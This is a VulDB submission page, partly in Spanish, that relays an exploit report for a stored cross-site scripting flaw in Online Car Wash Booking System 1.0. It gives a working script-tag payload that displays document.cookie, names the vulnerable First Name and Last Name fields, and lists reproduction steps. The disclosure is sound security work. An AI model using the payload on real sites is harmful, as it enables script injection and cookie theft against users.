| Título | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Descripción | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user
3. In that "First Name" and " Last Name " parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| Usuario | Anonymous User |
|---|
| Sumisión | 2024-05-25 15:19 (hace 2 años) |
|---|
| Moderación | 2024-05-25 20:27 (5 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name secuencias de comandos en sitios cruzados] |
|---|
| Puntos | 17 |
|---|